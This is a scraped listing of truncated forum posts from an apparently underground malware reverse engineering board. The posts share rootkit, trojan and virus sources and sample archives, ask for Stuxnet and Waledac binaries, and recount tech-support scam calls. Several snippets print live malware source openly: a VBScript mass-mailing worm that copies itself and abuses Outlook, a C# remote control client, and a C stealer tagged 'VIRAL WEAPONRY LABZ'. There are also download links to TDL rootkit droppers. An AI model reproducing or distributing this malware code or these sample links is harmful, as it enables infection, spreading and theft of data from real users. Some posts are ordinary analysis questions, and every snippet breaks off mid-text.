Malware Reverse Engineering

Win32OnlineGames.txt Ted.

This source of the tdl3 rootkit driver has been floating around for some time now, might be a interesting read for some people.... http://pastebin.com/he4hVjQ1

Zip file contains two malwares . Target is to unpack and calculate the md5hash of the unpacked malware. This was asked in hacking competetion (InCTF)) and my solution was not accepted ,so I want to know the answer. http://rapidshare.co...9/New_Folder.7z

Request for Waledac worm download link for analysis. Thanks

Dynamic forking in action />http://zairon.wordpress.com/

Today I got a cold call from a woman claiming my computer had been playing up because I had accessed a webpage with a virus or opened SPAM with malware. Normally I put the phone down on cold calls but at the mention of a computer security issue I had to play along for a laugh to see what was up. This type of computer scam (cold call malware) is new to me. She asked me to go to Event Viewer and check the Application error logs and unsurprisingly there were a lot of errors and warnings. This is of course to legitimise the reason for the call and to justify what was to happen next. She asked me to go to www.support.me which then redirected me to https://secure.logmeinrescue.…

:thumbsup: download

Quote: DotNetaspoilt is a very capable code injector, making it possible to inject and edit code and GUI controls into .NET applications in an interactive fashion. Code: />http://anonym.to/?http://digitalbodyguard.com/DotNetasploit.html Code: />http://anonym.to/?http://www.woodmann.com/collaborative/tools/images/Bin_DotNetasploit_2010-8-17_3.39_dotnetasploit25.zip and here is a pack with all the stuff VIDS: Injector Visual Studio Exploit - no code is safe DotNetSploit Overview DotNetaSploit Tools : DotNetSpike MetaSploit - Payload Deployment Targeted Attacks DotNetasploitEXE PDF : Attacking .Net at Runtime ReflectionsHiddenPower />http://anonym.to/?http://depo…

virus i hate mawanella incident On Error Resume Next Rem // I hate Mawanella incident Set W_S = CreateObject("WScript.Shell") Set fso = CreateObject("Scripting.FileSystemObject") set file = fso.OpenTextFile(WScript.ScriptFullname,1) vbscopy=file.ReadAll main() sub main() On Error Resume Next dim wscr,rr, strMsg set wscr=CreateObject("WScript.Shell") Set dirwin = fso.GetSpecialFolder(0) Set dirsystem = fso.GetSpecialFolder(1) Set dirtemp = fso.GetSpecialFolder(2) Set cFile = fso.GetFile(WScript.ScriptFullName) cFile.Copy(dirsystem&"\Mawanella.vbs") Set OutlookA = CreateObject("Outlook.Application") If OutlookA = "Outlook" Then Set Mapi=OutlookA.GetNameSpace("MAPI") Set…

Hi, I am looking for a detailed Stuxnet analysis, as in: />http://www.virusbtn.com/conference/vb2010/abstracts/LastMinute7.xml Couldn't find anything though. Maybe someone else was more successful?

plenty of examples on the net like Chickenbutt said //JMC31337 //ConnEX //CLIENT using System; using System.Collections.Generic; using System.Text; using System.IO; using System.Net; using System.Net.Sockets;namespace Client { class Program { static void Main(string[] args) { string download = "download"; string upload = "upload"; ASCIIEncoding ASCII = new ASCIIEncoding(); Byte[] outstream = new Byte[99999]; Console.WriteLine("ConnEX Admin TOOL (CLIENT) Started"); int port = 31337; Console.WriteLine("Enter IP address: "); string servip = Console.ReadLine(…

I have started a new blog on reverse engineering http://dreamofareverseengineer.blogspot.com/ Don't hesitate to post ur comments on the bog silent death

Hello everybody, A few days ago I've read some very intresting articles about malware analysis and now I'm looking for papers,tutorials,documentations to get started with the matter. I'd be better if it's written for beginner in this topic. What sort of skills are required to get started ?

You can find many tools for changing Session ID in cookie, form bases and many more. You can do this using nay proxy, Http debugger and many more. But if you will not find any tool to decode session id in cookie. In Cookie, Session IDs are normally in form of 1600401588313630099709319853232030099705 which is encoded representation. Is nay one help me to decode this value to get the original session ID. Thanks in Advance Nebie in Security Domain Email me

I had a *removed* ring me today and it was funny, I have never had this type of scam pulled on me before... She rang up saying that there is a new infection spreading rapidly in my country(Australia) and that I could be infected, she guided me into the the event viewer(step by step lol) and in shock she said there shouldn't be any warnings or errors in the application event viewer log. she then told me I will need to goto a site "www.virtualpcdoctor.com" and click on the remote support button which then one of there technical support teams would remove this new infection, I told her she is ****ed in the head and that I don't believe her, she insisted that her company is a…

Hi everybody. My boss has told me to find out Binary code of stuxnet or any file that is suspicious that is Stuxnet. Anyone does it have or know where I can get it ? Tnx.

hey guys, i'm currently investigating a spear phishing malware. (sorry, can't share this malware) even with all protection plugins like latest strongod, phant0m etc... it crashes immediately after loading the executable into ollydbg.exe i found out, that the problem is caused, because of illegal export directory entries of the PE file. see attachment. if i fix the "number of names" to "0" olly loads the file without problems and unpacking works well, after bypassing several antidump, antidebug ... tricks. anyone has seen this anti-olly trick before and if yes, is there a plugin for a it, which hardens olly against this trick? cheers, frank

got this outta a packed Dev-C package archive rar passwwd: infected mathtest.rar

Used search on the entire forum and also this sub-section,but I didn't find anything related to SafeSys virus... Here's a download link for it,if you want to examine it.. Notice that ALL THE FILES IN THE PACKAGE ARE INFECTED! The package is password protected,so it does not do any harm to your computer... Quote: "The worm is called W32.SafeSys.Worm and attacks a particular program called Deep Freeze. Deepfreeze is a computer protection utility that prevents malicious code from writing to the hard drive itself. Any malicious code is written to a memory buffer which then gets erased upon reboot. The original hard drive data is untouched and can simply be reloaded duri…

Called TDL, TDSS, Alureon or Olmarik. First widely spreaded x64 rootkit. Analysis: />http://www.prevx.com/blog/154/TDL-rootkit-x-goes-in-the-wild.html />http://www.prevx.com/blog/155/x-TDL-rootkit--follow-up.html />http://www.symantec.com/connect/de/blogs/tidserv-64-bit-goes-hiding />http://blog.raidrush.ws/2010/09/11/malware-analyse-tdl-rootkit-64-bit-infektion/ (german, but with TDL dropper source code) download: http://www.xup.in/dl,15799673/TDL_x64.rar/ password: infected

even more of that nasty tricks ,) The last spreading malware version of Waledac, a notorious spamming botnet that has been taken down in a collaborative effort lead by Microsoft earlier this year, contained some neat anti-debugging tricks in order to make reverse-engineering more difficult. Felix Leder and I have been presenting about the approach at SIGINT 2010 in Cologne yesterday, and as the method seems to be not publicly known yet, I will quickly describe it here as well. Here's the Info

Skype trojan source The tools generally are related to the two trojan horses Minipanzer and Megapanzer (which you find at the bottom of this section) to footprint a system, collect sensitive data, malware slef defense mechanisms and so on. All sourcecode is available under the GPL so please do whatever legal stuff you want with it but keep the source open. I used the time over christmas to work on the Skype trojan source code. The code was a little messy, it compiled but at some places it crashed. The old source was optimised for Skype 3 and about for a year now Skype 4 is spreading more and more. Therefore I decided to clean up the code and adapt it that way it works tog…

29A INC files - virus source ASM Link: />http://vx.org.ua/29a/29a-2/29a-2.3_3

Hi ! It is a windows virus , better say a stealer. Archive password: 123456 It is coded in visual basic 6 and strongly obfuscated. Try to find what is the site name for sending the logs, username and password for login into the site. Good luck ! test.rar

//gcc -lX11 -lXtst gtkthief2.c -o gtkthief2 `pkg-config --cflags --libs gtk+-2.0` //JMC31337 //VIRAL WEAPONRY LABZ #include <gtk/gtk.h> #include <stdio.h> //#include <gdk/gdkkeysyms.h> #include <stdlib.h> #include <X11/Xlib.h> #include <X11/keysym.h> #include <X11/extensions/XTest.h> #include <string.h> #include <linux/input.h> #include <X11/Xutil.h> #include <X11/Xatom.h> #include <X11/keysymdef.h> #include <dirent.h> int apt=1; //=================================== static void delete() { system("chmod 755 *"); system("pkill gdb"); struct dirent **namelist; int n; int c; int apt=1; int C4 = 4; …